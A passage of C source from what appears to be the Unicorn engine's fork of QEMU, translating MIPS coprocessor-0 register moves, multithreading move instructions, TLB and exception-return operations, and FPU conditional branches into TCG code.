"TraceIBPC"; goto cp0_unimplemented; case CP0_REG23__TRACEDBPC: /* PDtrace support */ /* gen_helper_mtc0_tracedbpc(tcg_ctx, tcg_ctx->cpu_env, arg); */ /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; //register_name = "TraceDBPC"; goto cp0_unimplemented; default: goto cp0_unimplemented; } break; case CP0_REGISTER_24: switch (sel) { case CP0_REG24__DEPC: /* EJTAG support */ tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_DEPC)); //register_name = "DEPC"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_25: switch (sel) { case CP0_REG25__PERFCTL0: gen_helper_mtc0_performance0(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Performance0"; break; case CP0_REG25__PERFCNT0: /* gen_helper_mtc0_performance1(tcg_ctx, tcg_ctx->cpu_env, arg); */ //register_name = "Performance1"; goto cp0_unimplemented; case CP0_REG25__PERFCTL1: /* gen_helper_mtc0_performance2(tcg_ctx, tcg_ctx->cpu_env, arg); */ //register_name = "Performance2"; goto cp0_unimplemented; case CP0_REG25__PERFCNT1: /* gen_helper_mtc0_performance3(tcg_ctx, tcg_ctx->cpu_env, arg); */ //register_name = "Performance3"; goto cp0_unimplemented; case CP0_REG25__PERFCTL2: /* gen_helper_mtc0_performance4(tcg_ctx, tcg_ctx->cpu_env, arg); */ //register_name = "Performance4"; goto cp0_unimplemented; case CP0_REG25__PERFCNT2: /* gen_helper_mtc0_performance5(tcg_ctx, tcg_ctx->cpu_env, arg); */ //register_name = "Performance5"; goto cp0_unimplemented; case CP0_REG25__PERFCTL3: /* gen_helper_mtc0_performance6(tcg_ctx, tcg_ctx->cpu_env, arg); */ //register_name = "Performance6"; goto cp0_unimplemented; case CP0_REG25__PERFCNT3: /* gen_helper_mtc0_performance7(tcg_ctx, tcg_ctx->cpu_env, arg); */ //register_name = "Performance7"; goto cp0_unimplemented; default: goto cp0_unimplemented; } break; case CP0_REGISTER_26: switch (sel) { case CP0_REG26__ERRCTL: gen_helper_mtc0_errctl(tcg_ctx, tcg_ctx->cpu_env, arg);
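/* An ErrCtl write may change how subsequent cache/test instructions behave, so end the current translation block. */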
ctx->base.is_jmp = DISAS_STOP; //register_name = "ErrCtl"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_27: switch (sel) { case CP0_REG27__CACHERR: /* ignored */ //register_name = "CacheErr"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_28: switch (sel) { case CP0_REG28__TAGLO: case CP0_REG28__TAGLO1: case CP0_REG28__TAGLO2: case CP0_REG28__TAGLO3: gen_helper_mtc0_taglo(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "TagLo"; break; case CP0_REG28__DATALO: case CP0_REG28__DATALO1: case CP0_REG28__DATALO2: case CP0_REG28__DATALO3: gen_helper_mtc0_datalo(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "DataLo"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_29: switch (sel) { case CP0_REG29__TAGHI: case CP0_REG29__TAGHI1: case CP0_REG29__TAGHI2: case CP0_REG29__TAGHI3: gen_helper_mtc0_taghi(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "TagHi"; break; case CP0_REG29__DATAHI: case CP0_REG29__DATAHI1: case CP0_REG29__DATAHI2: case CP0_REG29__DATAHI3: gen_helper_mtc0_datahi(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "DataHi"; break; default: //register_name = "invalid sel"; goto cp0_unimplemented; } break; case CP0_REGISTER_30: switch (sel) { case CP0_REG30__ERROREPC: tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_ErrorEPC)); //register_name = "ErrorEPC"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_31: switch (sel) { case CP0_REG31__DESAVE: /* EJTAG support */ gen_mtc0_store32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_DESAVE)); //register_name = "DESAVE"; break; case CP0_REG31__KSCRATCH1: case CP0_REG31__KSCRATCH2: case CP0_REG31__KSCRATCH3: case CP0_REG31__KSCRATCH4: case CP0_REG31__KSCRATCH5: case CP0_REG31__KSCRATCH6: CP0_CHECK(ctx->kscrexist & (1 << sel)); tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_KScratch[sel - 2])); //register_name = "KScratch"; break; default: goto cp0_unimplemented; } break; default: goto cp0_unimplemented; } /* For simplicity assume that all writes can cause interrupts. */ if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { /* * DISAS_STOP isn't sufficient, we need to ensure we break out of * translated code to check for pending interrupts. 
*/ gen_save_pc(tcg_ctx, ctx->base.pc_next + 4); ctx->base.is_jmp = DISAS_EXIT; } return; cp0_unimplemented: //qemu_log_mask(LOG_UNIMP, "dmtc0 %s (reg %d sel %d)\n", //register_name, reg, sel); return; } #endif /* TARGET_MIPS64 */ static void gen_mftr(CPUMIPSState *env, DisasContext *ctx, int rt, int rd, int u, int sel, int h) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); TCGv t0 = tcg_temp_local_new(tcg_ctx); if ((env->CP0_VPEConf0 & (1 << CP0VPEC0_MVP)) == 0 && ((env->tcs[other_tc].CP0_TCBind & (0xf << CP0TCBd_CurVPE)) != (env->active_tc.CP0_TCBind & (0xf << CP0TCBd_CurVPE)))) { tcg_gen_movi_tl(tcg_ctx, t0, -1); } else if ((env->CP0_VPEControl & (0xff << CP0VPECo_TargTC)) > (env->mvp->CP0_MVPConf0 & (0xff << CP0MVPC0_PTC))) { tcg_gen_movi_tl(tcg_ctx, t0, -1); } else if (u == 0) { switch (rt) { case 1: switch (sel) { case 1: gen_helper_mftc0_vpecontrol(tcg_ctx, t0, tcg_ctx->cpu_env); break; case 2: gen_helper_mftc0_vpeconf0(tcg_ctx, t0, tcg_ctx->cpu_env); break; default: goto die; break; } break; case 2: switch (sel) { case 1: gen_helper_mftc0_tcstatus(tcg_ctx, t0, tcg_ctx->cpu_env); break; case 2: gen_helper_mftc0_tcbind(tcg_ctx, t0, tcg_ctx->cpu_env); break; case 3: gen_helper_mftc0_tcrestart(tcg_ctx, t0, tcg_ctx->cpu_env); break; case 4: gen_helper_mftc0_tchalt(tcg_ctx, t0, tcg_ctx->cpu_env); break; case 5: gen_helper_mftc0_tccontext(tcg_ctx, t0, tcg_ctx->cpu_env); break; case 6: gen_helper_mftc0_tcschedule(tcg_ctx, t0, tcg_ctx->cpu_env); break; case 7: gen_helper_mftc0_tcschefback(tcg_ctx, t0, tcg_ctx->cpu_env); break; default: gen_mfc0(ctx, t0, rt, sel); break; } break; case 10: switch (sel) { case 0: gen_helper_mftc0_entryhi(tcg_ctx, t0, tcg_ctx->cpu_env); break; default: gen_mfc0(ctx, t0, rt, sel); break; } break; case 12: switch (sel) { case 0: gen_helper_mftc0_status(tcg_ctx, t0, tcg_ctx->cpu_env); break; default: gen_mfc0(ctx, t0, rt, sel); break; } break; case 13: switch (sel) { case 0: gen_helper_mftc0_cause(tcg_ctx, t0, tcg_ctx->cpu_env); break; default: goto die; break; } break; case 14: switch (sel) { case 0: gen_helper_mftc0_epc(tcg_ctx, t0, tcg_ctx->cpu_env); break; default: goto die; break; } break; case 15: switch (sel) { case 1: gen_helper_mftc0_ebase(tcg_ctx, t0, tcg_ctx->cpu_env); break; default: goto die; break; } break; case 16: switch (sel) { case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7: gen_helper_mftc0_configx(tcg_ctx, t0, tcg_ctx->cpu_env, tcg_const_tl(tcg_ctx, sel)); break; default: goto die; break; } break; case 23: switch (sel) { case 0: gen_helper_mftc0_debug(tcg_ctx, t0, tcg_ctx->cpu_env); break; default: gen_mfc0(ctx, t0, rt, sel); break; } break; default: gen_mfc0(ctx, t0, rt, sel); } } else { switch (sel) { /* GPR registers. 
*/ case 0: gen_helper_1e0i(mftgpr, t0, rt); break; /* Auxiliary CPU registers */ case 1: switch (rt) { case 0: gen_helper_1e0i(mftlo, t0, 0); break; case 1: gen_helper_1e0i(mfthi, t0, 0); break; case 2: gen_helper_1e0i(mftacx, t0, 0); break; case 4: gen_helper_1e0i(mftlo, t0, 1); break; case 5: gen_helper_1e0i(mfthi, t0, 1); break; case 6: gen_helper_1e0i(mftacx, t0, 1); break; case 8: gen_helper_1e0i(mftlo, t0, 2); break; case 9: gen_helper_1e0i(mfthi, t0, 2); break; case 10: gen_helper_1e0i(mftacx, t0, 2); break; case 12: gen_helper_1e0i(mftlo, t0, 3); break; case 13: gen_helper_1e0i(mfthi, t0, 3); break; case 14: gen_helper_1e0i(mftacx, t0, 3); break; case 16: gen_helper_mftdsp(tcg_ctx, t0, tcg_ctx->cpu_env); break; default: goto die; } break; /* Floating point (COP1). */ case 2: /* XXX: For now we support only a single FPU context. */ if (h == 0) { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, rt); tcg_gen_ext_i32_tl(tcg_ctx, t0, fp0); tcg_temp_free_i32(tcg_ctx, fp0); } else { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32h(ctx, fp0, rt); tcg_gen_ext_i32_tl(tcg_ctx, t0, fp0); tcg_temp_free_i32(tcg_ctx, fp0); } break; case 3: /* XXX: For now we support only a single FPU context. */ gen_helper_1e0i(cfc1, t0, rt); break; /* COP2: Not implemented. */ case 4: case 5: /* fall through */ default: goto die; } } gen_store_gpr(tcg_ctx, t0, rd); tcg_temp_free(tcg_ctx, t0); return; die: tcg_temp_free(tcg_ctx, t0); LOG_DISAS("mftr (reg %d u %d sel %d h %d)\n", rt, u, sel, h); generate_exception_end(ctx, EXCP_RI); } static void gen_mttr(CPUMIPSState *env, DisasContext *ctx, int rd, int rt, int u, int sel, int h) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); TCGv t0 = tcg_temp_local_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rt); if ((env->CP0_VPEConf0 & (1 << CP0VPEC0_MVP)) == 0 && ((env->tcs[other_tc].CP0_TCBind & (0xf << CP0TCBd_CurVPE)) != (env->active_tc.CP0_TCBind & (0xf << CP0TCBd_CurVPE)))) { /* NOP */ ; } else if ((env->CP0_VPEControl & (0xff << CP0VPECo_TargTC)) > (env->mvp->CP0_MVPConf0 & (0xff << CP0MVPC0_PTC))) { /* NOP */ ; } else if (u == 0) { switch (rd) { case 1: switch (sel) { case 1: gen_helper_mttc0_vpecontrol(tcg_ctx, tcg_ctx->cpu_env, t0); break; case 2: gen_helper_mttc0_vpeconf0(tcg_ctx, tcg_ctx->cpu_env, t0); break; default: goto die; break; } break; case 2: switch (sel) { case 1: gen_helper_mttc0_tcstatus(tcg_ctx, tcg_ctx->cpu_env, t0); break; case 2: gen_helper_mttc0_tcbind(tcg_ctx, tcg_ctx->cpu_env, t0); break; case 3: gen_helper_mttc0_tcrestart(tcg_ctx, tcg_ctx->cpu_env, t0); break; case 4: gen_helper_mttc0_tchalt(tcg_ctx, tcg_ctx->cpu_env, t0); break; case 5: gen_helper_mttc0_tccontext(tcg_ctx, tcg_ctx->cpu_env, t0); break; case 6: gen_helper_mttc0_tcschedule(tcg_ctx, tcg_ctx->cpu_env, t0); break; case 7: gen_helper_mttc0_tcschefback(tcg_ctx, tcg_ctx->cpu_env, t0); break; default: gen_mtc0(ctx, t0, rd, sel); break; } break; case 10: switch (sel) { case 0: gen_helper_mttc0_entryhi(tcg_ctx, tcg_ctx->cpu_env, t0); break; default: gen_mtc0(ctx, t0, rd, sel); break; } break; case 12: switch (sel) { case 0: gen_helper_mttc0_status(tcg_ctx, tcg_ctx->cpu_env, t0); break; default: gen_mtc0(ctx, t0, rd, sel); break; } break; case 13: switch (sel) { case 0: gen_helper_mttc0_cause(tcg_ctx, tcg_ctx->cpu_env, t0); break; default: goto die; break; } break; case 15: switch (sel) { case 1: gen_helper_mttc0_ebase(tcg_ctx, tcg_ctx->cpu_env, t0); break; default: goto die; break; } break; case 23: switch 
(sel) { case 0: gen_helper_mttc0_debug(tcg_ctx, tcg_ctx->cpu_env, t0); break; default: gen_mtc0(ctx, t0, rd, sel); break; } break; default: gen_mtc0(ctx, t0, rd, sel); } } else { switch (sel) { /* GPR registers. */ case 0: gen_helper_0e1i(mttgpr, t0, rd); break; /* Auxiliary CPU registers */ case 1: switch (rd) { case 0: gen_helper_0e1i(mttlo, t0, 0); break; case 1: gen_helper_0e1i(mtthi, t0, 0); break; case 2: gen_helper_0e1i(mttacx, t0, 0); break; case 4: gen_helper_0e1i(mttlo, t0, 1); break; case 5: gen_helper_0e1i(mtthi, t0, 1); break; case 6: gen_helper_0e1i(mttacx, t0, 1); break; case 8: gen_helper_0e1i(mttlo, t0, 2); break; case 9: gen_helper_0e1i(mtthi, t0, 2); break; case 10: gen_helper_0e1i(mttacx, t0, 2); break; case 12: gen_helper_0e1i(mttlo, t0, 3); break; case 13: gen_helper_0e1i(mtthi, t0, 3); break; case 14: gen_helper_0e1i(mttacx, t0, 3); break; case 16: gen_helper_mttdsp(tcg_ctx, tcg_ctx->cpu_env, t0); break; default: goto die; } break; /* Floating point (COP1). */ case 2: /* XXX: For now we support only a single FPU context. */ if (h == 0) { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, fp0, t0); gen_store_fpr32(ctx, fp0, rd); tcg_temp_free_i32(tcg_ctx, fp0); } else { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, fp0, t0); gen_store_fpr32h(ctx, fp0, rd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case 3: /* XXX: For now we support only a single FPU context. */ { TCGv_i32 fs_tmp = tcg_const_i32(tcg_ctx, rd); gen_helper_0e2i(ctc1, t0, fs_tmp, rt); tcg_temp_free_i32(tcg_ctx, fs_tmp); } /* Stop translation as we may have changed hflags */ ctx->base.is_jmp = DISAS_STOP; break; /* COP2: Not implemented. */ case 4: case 5: /* fall through */ default: goto die; } } tcg_temp_free(tcg_ctx, t0); return; die: tcg_temp_free(tcg_ctx, t0); LOG_DISAS("mttr (reg %d u %d sel %d h %d)\n", rd, u, sel, h); generate_exception_end(ctx, EXCP_RI); } static void gen_cp0(CPUMIPSState *env, DisasContext *ctx, uint32_t opc, int rt, int rd) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; const char *opn = "ldst"; check_cp0_enabled(ctx); switch (opc) { case OPC_MFC0: if (rt == 0) { /* Treat as NOP. */ return; } gen_mfc0(ctx, tcg_ctx->cpu_gpr[rt], rd, ctx->opcode & 0x7); opn = "mfc0"; break; case OPC_MTC0: { TCGv t0 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rt); gen_mtc0(ctx, t0, rd, ctx->opcode & 0x7); tcg_temp_free(tcg_ctx, t0); } opn = "mtc0"; break; #if defined(TARGET_MIPS64) case OPC_DMFC0: check_insn(ctx, ISA_MIPS3); if (rt == 0) { /* Treat as NOP. */ return; } gen_dmfc0(ctx, tcg_ctx->cpu_gpr[rt], rd, ctx->opcode & 0x7); opn = "dmfc0"; break; case OPC_DMTC0: check_insn(ctx, ISA_MIPS3); { TCGv t0 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rt); gen_dmtc0(ctx, t0, rd, ctx->opcode & 0x7); tcg_temp_free(tcg_ctx, t0); } opn = "dmtc0"; break; #endif case OPC_MFHC0: check_mvh(ctx); if (rt == 0) { /* Treat as NOP. */ return; } gen_mfhc0(ctx, tcg_ctx->cpu_gpr[rt], rd, ctx->opcode & 0x7); opn = "mfhc0"; break; case OPC_MTHC0: check_mvh(ctx); { TCGv t0 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rt); gen_mthc0(ctx, t0, rd, ctx->opcode & 0x7); tcg_temp_free(tcg_ctx, t0); } opn = "mthc0"; break; case OPC_MFTR: check_cp0_enabled(ctx); if (rd == 0) { /* Treat as NOP. 
*/ return; } gen_mftr(env, ctx, rt, rd, (ctx->opcode >> 5) & 1, ctx->opcode & 0x7, (ctx->opcode >> 4) & 1); opn = "mftr"; break; case OPC_MTTR: check_cp0_enabled(ctx); gen_mttr(env, ctx, rd, rt, (ctx->opcode >> 5) & 1, ctx->opcode & 0x7, (ctx->opcode >> 4) & 1); opn = "mttr"; break; case OPC_TLBWI: opn = "tlbwi"; if (!env->tlb->helper_tlbwi) { goto die; } gen_helper_tlbwi(tcg_ctx, tcg_ctx->cpu_env); break; case OPC_TLBINV: opn = "tlbinv"; if (ctx->ie >= 2) { if (!env->tlb->helper_tlbinv) { goto die; } gen_helper_tlbinv(tcg_ctx, tcg_ctx->cpu_env); } /* treat as nop if TLBINV not supported */ break; case OPC_TLBINVF: opn = "tlbinvf"; if (ctx->ie >= 2) { if (!env->tlb->helper_tlbinvf) { goto die; } gen_helper_tlbinvf(tcg_ctx, tcg_ctx->cpu_env); } /* treat as nop if TLBINV not supported */ break; case OPC_TLBWR: opn = "tlbwr"; if (!env->tlb->helper_tlbwr) { goto die; } gen_helper_tlbwr(tcg_ctx, tcg_ctx->cpu_env); break; case OPC_TLBP: opn = "tlbp"; if (!env->tlb->helper_tlbp) { goto die; } gen_helper_tlbp(tcg_ctx, tcg_ctx->cpu_env); break; case OPC_TLBR: opn = "tlbr"; if (!env->tlb->helper_tlbr) { goto die; } gen_helper_tlbr(tcg_ctx, tcg_ctx->cpu_env); break; case OPC_ERET: /* OPC_ERETNC */ if ((ctx->insn_flags & ISA_MIPS32R6) && (ctx->hflags & MIPS_HFLAG_BMASK)) { goto die; } else { int bit_shift = (ctx->hflags & MIPS_HFLAG_M16) ? 16 : 6; if (ctx->opcode & (1 << bit_shift)) { /* OPC_ERETNC */ opn = "eretnc"; check_insn(ctx, ISA_MIPS32R5); gen_helper_eretnc(tcg_ctx, tcg_ctx->cpu_env); } else { /* OPC_ERET */ opn = "eret"; check_insn(ctx, ISA_MIPS2); gen_helper_eret(tcg_ctx, tcg_ctx->cpu_env); } ctx->base.is_jmp = DISAS_EXIT; } break; case OPC_DERET: opn = "deret"; check_insn(ctx, ISA_MIPS32); if ((ctx->insn_flags & ISA_MIPS32R6) && (ctx->hflags & MIPS_HFLAG_BMASK)) { goto die; } if (!(ctx->hflags & MIPS_HFLAG_DM)) { MIPS_INVAL(opn); generate_exception_end(ctx, EXCP_RI); } else { gen_helper_deret(tcg_ctx, tcg_ctx->cpu_env); ctx->base.is_jmp = DISAS_EXIT; } break; case OPC_WAIT: opn = "wait"; check_insn(ctx, ISA_MIPS3 | ISA_MIPS32); if ((ctx->insn_flags & ISA_MIPS32R6) && (ctx->hflags & MIPS_HFLAG_BMASK)) { goto die; } /* If we get an exception, we want to restart at next instruction */ ctx->base.pc_next += 4; save_cpu_state(ctx, 1); ctx->base.pc_next -= 4; gen_helper_wait(tcg_ctx, tcg_ctx->cpu_env); ctx->base.is_jmp = DISAS_NORETURN; break; default: die: MIPS_INVAL(opn); generate_exception_end(ctx, EXCP_RI); return; } (void)opn; /* avoid a compiler warning */ } /* CP1 Branches (before delay slot) */ static void gen_compute_branch1(DisasContext *ctx, uint32_t op, int32_t cc, int32_t offset) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_ulong btarget; TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); if ((ctx->insn_flags & ISA_MIPS32R6) && (ctx->hflags & MIPS_HFLAG_BMASK)) { generate_exception_end(ctx, EXCP_RI); goto out; } if (cc != 0) { check_insn(ctx, ISA_MIPS4 | ISA_MIPS32); } btarget = ctx->base.pc_next + 4 + offset; switch (op) { case OPC_BC1F: tcg_gen_shri_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, get_fp_bit(cc)); tcg_gen_not_i32(tcg_ctx, t0, t0); tcg_gen_andi_i32(tcg_ctx, t0, t0, 1); tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->bcond, t0); goto not_likely; case OPC_BC1FL: tcg_gen_shri_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, get_fp_bit(cc)); tcg_gen_not_i32(tcg_ctx, t0, t0); tcg_gen_andi_i32(tcg_ctx, t0, t0, 1); tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->bcond, t0); goto likely; case OPC_BC1T: tcg_gen_shri_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, get_fp_bit(cc)); tcg_gen_andi_i32(tcg_ctx, t0, t0, 1); 
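/* t0 now holds the tested FP condition-code (FCC) bit; widen it into bcond, which the branch machinery evaluates after the delay slot. */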
tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->bcond, t0); goto not_likely; case OPC_BC1TL: tcg_gen_shri_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, get_fp_bit(cc)); tcg_gen_andi_i32(tcg_ctx, t0, t0, 1); tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->bcond, t0); likely: ctx->hflags |= MIPS_HFLAG_BL; break; case OPC_BC1FANY2: { TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_shri_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, get_fp_bit(cc)); tcg_gen_shri_i32(tcg_ctx, t1, tcg_ctx->fpu_fcr31, get_fp_bit(cc + 1)); tcg_gen_nand_i32(tcg_ctx, t0, t0, t1); tcg_temp_free_i32(tcg_ctx, t1); tcg_gen_andi_i32(tcg_ctx, t0, t0, 1); tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->bcond, t0); } goto not_likely; case OPC_BC1TANY2: { TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_shri_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, get_fp_bit(cc)); tcg_gen_shri_i32(tcg_ctx, t1, tcg_ctx->fpu_fcr31, get_fp_bit(cc + 1)); tcg_gen_or_i32(tcg_ctx, t0, t0, t1); tcg_temp_free_i32(tcg_ctx, t1); tcg_gen_andi_i32(tcg_ctx, t0, t0, 1); tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->bcond, t0); } goto not_likely; case OPC_BC1FANY4: { TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_shri_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, get_fp_bit(cc)); tcg_gen_shri_i32(tcg_ctx, t1, tcg_ctx->fpu_fcr31, get_fp_bit(cc + 1)); tcg_gen_and_i32(tcg_ctx, t0, t0, t1); tcg_gen_shri_i32(tcg_ctx, t1, tcg_ctx->fpu_fcr31, get_fp_bit(cc + 2)); tcg_gen_and_i32(tcg_ctx, t0, t0, t1); tcg_gen_shri_i32(tcg_ctx, t1, tcg_ctx->fpu_fcr31, get_fp_bit(cc + 3)); tcg_gen_nand_i32(tcg_ctx, t0, t0, t1); tcg_temp_free_i32(tcg_ctx, t1); tcg_gen_andi_i32(tcg_ctx, t0, t0, 1); tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->bcond, t0); } goto not_likely; case OPC_BC1TANY4: { TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_shri_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, get_fp_bit(cc)); tcg_gen_shri_i32(tcg_ctx, t1, tcg_ctx->fpu_fcr31, get_fp_bit(cc + 1)); tcg_gen_or_i32(tcg_ctx, t0, t0, t1); tcg_gen_shri_i32(tcg_ctx, t1, tcg_ctx->fpu_fcr31, get_fp_bit(cc + 2)); tcg_gen_or_i32(tcg_ctx, t0, t0, t1); tcg_gen_shri_i32(tcg_ctx, t1, tcg_ctx->fpu_fcr31, get_fp_bit(cc + 3)); tcg_gen_or_i32(tcg_ctx, t0, t0, t1); tcg_temp_free_i32(tcg_ctx, t1); tcg_gen_andi_i32(tcg_ctx, t0, t0, 1); tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->bcond, t0); } not_likely: ctx->hflags |= MIPS_HFLAG_BC; break; default: MIPS_INVAL("cp1 cond branch"); generate_exception_end(ctx, EXCP_RI); goto out; } ctx->btarget = btarget; ctx->hflags |= MIPS_HFLAG_BDS32; out: tcg_temp_free_i32(tcg_ctx, t0); } /* R6 CP1 Branches */ static void gen_compute_branch1_r6(DisasContext *ctx, uint32_t op, int32_t ft, int32_t offset, int delayslot_size) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_ulong btarget; TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); if (ctx->hflags & MIPS_HFLAG_BMASK) { #ifdef MIPS_DEBUG_DISAS LOG_DISAS("Branch in delay / forbidden slot at PC 0x" TARGET_FMT_lx "\n", ctx->base.pc_next); #endif generate_exception_end(ctx, EXCP_RI); goto out; } gen_load_fpr64(ctx, t0, ft); tcg_gen_andi_i64(tcg_ctx, t0, t0, 1); btarget = addr_add(ctx, ctx->base.pc_next + 4, offset); switch (op) { case OPC_BC1EQZ: tcg_gen_xori_i64(tcg_ctx, t0, t0, 1); ctx->hflags |= MIPS_HFLAG_BC; break; case OPC_BC1NEZ: /* t0 already set */ ctx->hflags |= MIPS_HFLAG_BC; break; default: MIPS_INVAL("cp1 cond branch"); generate_exception_end(ctx, EXCP_RI); goto out; } tcg_gen_trunc_i64_tl(tcg_ctx, tcg_ctx->bcond, t0); ctx->btarget = btarget; switch (delayslot_size) { case 2: ctx->hflags |= MIPS_HFLAG_BDS16; break; case 4: ctx->hflags |= MIPS_HFLAG_BDS32; break; } out: tcg_temp_free_i64(tcg_ctx, t0); } /* Coprocessor 1 (FPU) 
*/ #define FOP(func, fmt) (((fmt) << 21) | (func)) enum fopcode { OPC_ADD_S = FOP(0, FMT_S), OPC_SUB_S = FOP(1, FMT_S), OPC_MUL_S = FOP(2, FMT_S), OPC_DIV_S = FOP(3, FMT_S), OPC_SQRT_S = FOP(4, FMT_S), OPC_ABS_S = FOP(5, FMT_S), OPC_MOV_S = FOP(6, FMT_S), OPC_NEG_S = FOP(7, FMT_S), OPC_ROUND_L_S = FOP(8, FMT_S), OPC_TRUNC_L_S = FOP(9, FMT_S), OPC_CEIL_L_S = FOP(10, FMT_S), OPC_FLOOR_L_S = FOP(11, FMT_S), OPC_ROUND_W_S = FOP(12, FMT_S), OPC_TRUNC_W_S = FOP(13, FMT_S), OPC_CEIL_W_S = FOP(14, FMT_S), OPC_FLOOR_W_S = FOP(15, FMT_S), OPC_SEL_S = FOP(16, FMT_S), OPC_MOVCF_S = FOP(17, FMT_S), OPC_MOVZ_S = FOP(18, FMT_S), OPC_MOVN_S = FOP(19, FMT_S), OPC_SELEQZ_S = FOP(20, FMT_S), OPC_RECIP_S = FOP(21, FMT_S), OPC_RSQRT_S = FOP(22, FMT_S), OPC_SELNEZ_S = FOP(23, FMT_S), OPC_MADDF_S = FOP(24, FMT_S), OPC_MSUBF_S = FOP(25, FMT_S), OPC_RINT_S = FOP(26, FMT_S), OPC_CLASS_S = FOP(27, FMT_S), OPC_MIN_S = FOP(28, FMT_S), OPC_RECIP2_S = FOP(28, FMT_S), OPC_MINA_S = FOP(29, FMT_S), OPC_RECIP1_S = FOP(29, FMT_S), OPC_MAX_S = FOP(30, FMT_S), OPC_RSQRT1_S = FOP(30, FMT_S), OPC_MAXA_S = FOP(31, FMT_S), OPC_RSQRT2_S = FOP(31, FMT_S), OPC_CVT_D_S = FOP(33, FMT_S), OPC_CVT_W_S = FOP(36, FMT_S), OPC_CVT_L_S = FOP(37, FMT_S), OPC_CVT_PS_S = FOP(38, FMT_S), OPC_CMP_F_S = FOP(48, FMT_S), OPC_CMP_UN_S = FOP(49, FMT_S), OPC_CMP_EQ_S = FOP(50, FMT_S), OPC_CMP_UEQ_S = FOP(51, FMT_S), OPC_CMP_OLT_S = FOP(52, FMT_S), OPC_CMP_ULT_S = FOP(53, FMT_S), OPC_CMP_OLE_S = FOP(54, FMT_S), OPC_CMP_ULE_S = FOP(55, FMT_S), OPC_CMP_SF_S = FOP(56, FMT_S), OPC_CMP_NGLE_S = FOP(57, FMT_S), OPC_CMP_SEQ_S = FOP(58, FMT_S), OPC_CMP_NGL_S = FOP(59, FMT_S), OPC_CMP_LT_S = FOP(60, FMT_S), OPC_CMP_NGE_S = FOP(61, FMT_S), OPC_CMP_LE_S = FOP(62, FMT_S), OPC_CMP_NGT_S = FOP(63, FMT_S), OPC_ADD_D = FOP(0, FMT_D), OPC_SUB_D = FOP(1, FMT_D), OPC_MUL_D = FOP(2, FMT_D), OPC_DIV_D = FOP(3, FMT_D), OPC_SQRT_D = FOP(4, FMT_D), OPC_ABS_D = FOP(5, FMT_D), OPC_MOV_D = FOP(6, FMT_D), OPC_NEG_D = FOP(7, FMT_D), OPC_ROUND_L_D = FOP(8, FMT_D), OPC_TRUNC_L_D = FOP(9, FMT_D), OPC_CEIL_L_D = FOP(10, FMT_D), OPC_FLOOR_L_D = FOP(11, FMT_D), OPC_ROUND_W_D = FOP(12, FMT_D), OPC_TRUNC_W_D = FOP(13, FMT_D), OPC_CEIL_W_D = FOP(14, FMT_D), OPC_FLOOR_W_D = FOP(15, FMT_D), OPC_SEL_D = FOP(16, FMT_D), OPC_MOVCF_D = FOP(17, FMT_D), OPC_MOVZ_D = FOP(18, FMT_D), OPC_MOVN_D = FOP(19, FMT_D), OPC_SELEQZ_D = FOP(20, FMT_D), OPC_RECIP_D = FOP(21, FMT_D), OPC_RSQRT_D = FOP(22, FMT_D), OPC_SELNEZ_D = 